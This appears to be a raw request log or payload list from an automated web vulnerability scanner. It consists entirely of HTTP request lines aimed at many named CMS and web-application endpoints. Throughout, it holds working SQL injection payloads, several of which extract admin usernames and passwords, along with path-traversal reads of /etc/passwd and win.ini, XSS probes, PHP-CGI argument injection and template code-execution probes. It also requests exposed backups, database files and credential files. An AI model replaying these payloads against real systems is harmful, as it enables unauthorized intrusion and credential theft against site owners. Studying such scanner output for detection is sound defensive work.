GET /edoas2/edoas2_test.jsp
GET /Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
POST /celive/live/header.php
GET /SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
HEAD /skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
GET /RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
GET /m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
GET /BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
GET /Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
GET /plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
GET /admin/admin_database.aspx
GET /flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
GET /video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
GET /blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
GET /?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
GET /search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
GET /model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
GET /cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
GET /cctrl/backup/index.php
GET /cctrl/admin/purview/purview.php
HEAD /data_Xbaby/gdjm133950.mdb
GET /admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
GET /admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
GET /admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
POST /admin/upfile.asp
POST /admin/upfile_yqhy.asp
GET /FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
GET /FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
GET /FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
POST /VIEWGOOD/ADI/portal/UserDataSync.aspx
POST /SPM/Pc/Content/Request.aspx?action=name_check
GET /VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
GET /adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
GET /adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
GET /ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
GET /admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
POST /include/upload.asp
GET /TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
GET /TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
GET /Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
GET /WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
GET /WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
GET /Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
GET /Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
GET /products.asp
GET /App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
GET /product_view.asp
HEAD /system/database/data.mdb
POST /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
POST /manage/CHKLOGIN.ASP
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
POST /search.asp
GET /onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
HEAD /db1/%23kepu.mdb
POST /upfile.asp
POST /upfile2.asp
POST /upfile3.asp
HEAD /data/xinfang.mdb
GET /VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
HEAD /gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
GET /Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
POST /WS/WebServiceBase.asmx/GetXMLList
POST /WS/WebService.asmx/GetFile
POST /WS/WebService.asmx/GetFileContent
GET /WS/WebService.asmx
POST /bos/desktop/ajax/EcAjax.aspx
GET /bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
GET /Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
GET /ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
POST /interface/ipsconnect/ipsconnect.php
GET /templates/
GET /service/local/outreach/welcome/nexusSpaces.css
GET /phpRedisAdmin/?overview
GET /?overview
GET /index.html#/dashboard/file/logstash.json
GET /
GET /index.php/weblinks-categories?id=just_test
POST /index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
GET /index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
POST /FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
GET /index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
GET /share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
GET /oxoxoxoxoxoxox.com
GET /oxoxoxoxoxoxox.com/
POST /api/xmlrpc
HEAD /wwwroot.rar
HEAD /wwwroot.zip
HEAD /wwwroot.tar.gz
HEAD /web.rar
HEAD /www.rar
HEAD /www.zip
HEAD /www.tar.gz
HEAD /web.zip
GET /crossdomain.xml
PUT /webscan_test.txt
GET /phpinfo.php
GET /info.php
GET /test.php
GET /shop.php?ac=view&shopid=1-cfreer
GET /wp-includes/registration-functions.php
GET /wp-includes/registration.php
GET /
GET /
GET /NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
GET /pass.txt
GET /passwd
GET /password.txt
GET /passwords.txt
GET /users.txt
GET /users.ini
GET /admin.cfg
GET /install.log
GET /database.inc
GET /common.inc
GET /db.inc
GET /connect.inc
GET /conn.inc
GET /sql.inc
GET /.bash_history
GET /.bashrc
GET /Web.config
GET /Global.asax
GET /Global.asa
GET /Global.asax.cs
GET /data.mdb
GET /domcfg.nsf
GET /names.nsf
GET /log.nsf
GET /domlog.nsf
GET /.rediscli_history
GET /data/%23data.mdb
GET /config.inc.php.bak
GET /config/config_ucenter.php.bak
GET /config/config_global.php.bak
GET /uc_server/data/config.inc.php.bak
GET /data/common.inc.php.bak
GET /wp-config.php.bak
GET /WEB-INF/database.properties
GET /
GET /robots.txt
GET /
GET /index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
GET /
GET /nevercouldexistfilenosec
GET /nevercouldexistfilewebsec
GET /nevercouldexistfilenosec.aspx
GET /nevercouldexistfilewebsec.aspx
GET /nevercouldexistfilenosec.shtml
GET /nevercouldexistfilewebsec.shtml
GET /nevercouldexistfilenosec/
GET /nevercouldexistfilewebsec/
GET /nevercouldexistfilenosec.zip
GET /nevercouldexistfilewebsec.zip
GET /nevercouldexistfilenosec.php
GET /nevercouldexistfilewebsec.php
GET /nevercouldexistfilenosec.bak
GET /nevercouldexistfilewebsec.bak
GET /nevercouldexistfilenosec.rar
GET /nevercouldexistfilewebsec.rar
GET /
GET /
GET /wp-admin
GET /admin.php
PUT /jsky_web_scanner_test_file.txt
GET /dede/
GET /administrator/
GET /nosec_Web_Scanner_Test.dll
GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
GET /user
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
TRACE /TRACE_test
GET /%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
TRACK /TRACK_test
OPTIONS /
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /_vti_bin/_vti_adm/admin.dll
GET /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
GET /_vti_bin/_vti_aut/author.dll
GET /_vti_bin/shtml.exe?_vti_rpc
GET /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
GET /server-info
GET /%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
GET /server-status
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
GET /jmx-console/
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
GET /web-console/
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
GET /
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
GET /.../.../.../.../.../.../.../.../windows/win.ini
GET /webscan360noThisFile*~1*/.aspx
POST /cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
POST /cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
POST /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
POST /cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
POST /cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /etc/passwd
GET /etc/passwd
GET /
GET /phpMyAdmin/show_config_errors.php
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
GET /phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
GET /xampp/index.php
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
GET /axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
GET /?search=just_test_not_find_href
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
GET /$
GET /.../.../.../.../.../.../.../.../etc/passwd
GET /solr/dev/admin/
GET /
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
GET /level/15/exec/-/show/running-config/CR
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
GET /plugins/weathermap/weathermap-cacti-plugin.php
GET /
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
GET /
GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
GET /%3Cscript%3Ealert(42873).do
GET /icons/index
GET /%3Cscript%20s%3Ealert(42873)
GET /icons/small/index
GET /
GET /?%22onmouseover='prompt(42873)'bad=%22%3E
GET /%22%3E%3CsCrIpT%3Eprompt(42873)
GET /
GET /
GET /?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
GET /?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
GET /
GET /
GET /'IHLD
GET /
GET /
GET /compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
GET /install.php
GET /
GET /install/index.php
GET /
GET /fckeditor/editor/dialog/fck_about.html
GET /extras/curltest.php?url=file://curltest.php
GET /.svn/entries
GET /
GET /include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
GET /
GET /wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
POST /plus/carbuyaction.php
GET /plus/carbuyaction.php?dopost=return&code=../../index
GET /api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
GET /yp/product.php?q=&action=searchlist&where=%23
GET /indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
GET /yp/product.php?pagesize=$%7B@print(md5(42873))%7D
GET /index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
GET /invoker/EJBInvokerServlet/
GET /invoker/JMXInvokerServlet/
GET /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /
GET /_database/qiye_free.asp
GET /apps/include.php?file=index.php
GET /huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
GET /wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
POST /manage/login.php
GET /vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
GET /api/upload/swfthumbnail.php?id=../../include/common.inc.php
GET /Inc/conn.asp
POST /user/reg3.php
GET /
GET /News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
GET /celive/js/include.php?departmentid=webscan'&cmseasylive=1
GET /admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
GET /CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
GET /ask/search_ajax.php?q=s%bb%27
GET /yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /web/?id=-1'
GET /huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
GET /
GET /js/calendar.php?lang=../js
GET /
GET /xampp/showcode.php/showcode.php?showcode=1
GET /index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
POST /login.php
GET /admin/index.asp
GET /Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
GET /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
GET /phpcms/data/js.php?id=1
GET /index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
GET /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
HEAD /flow.php?step=login
GET /user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
GET /
GET /Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?user-getpass-1'
GET /?user-space-1'
POST /index.php
GET /admin/sysadmin_view.asp
GET /
GET /include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
POST /index.php?user-getpass
GET /common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
GET /admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
GET /member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
POST /register.php?do=submit
POST /management/login.asp
GET /index.php?-dauto_prepend_file%3d/etc/passwd+-n
GET /
POST /tools/ajax.aspx
